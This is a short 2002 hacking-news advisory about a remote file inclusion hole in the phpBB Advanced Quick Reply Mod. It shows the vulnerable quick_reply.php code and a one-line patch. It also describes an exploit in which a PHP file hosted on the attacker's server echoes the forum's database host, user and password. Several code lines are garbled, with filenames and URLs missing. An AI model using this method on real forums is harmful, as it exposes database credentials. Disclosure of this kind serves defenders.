Users login

Create an account »


Users login

Home » Hacking News » Code Injection in phpBB Advanced Quick Reply Mod

Code Injection in phpBB Advanced Quick Reply Mod

by Nikola Strahija on November 13th, 2002 It was found a security hole in this sofware (Code Injection). You can download this software at Hackers can exploit this Mod to inject some shell code to hack your forum, your website or your server (local exploit) because Code Injection is a dangerous technique of hackers.

Exploit: (quick_reply.php)

if ( $mode == 'smilies' )
define('IN_PHPBB', true);
include($phpbb_root_path . '');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);

And you can make a php file which named '' to inclusion to
access that forum. example:

echo "DB Type: $dbms
echo "DB Host: $dbhost
echo "DB Name: $dbname
echo "DB User: $dbuser
echo "DB Pass: $dbpasswd

After that, you upload this file to your server (http://[Your
Server]/ and enter URL
You'll be recived all DB Info of forum

Patch: (quick_reply.php)

if ( $mode == 'smilies' )
phpbb_root_path = "./";

Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.


Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »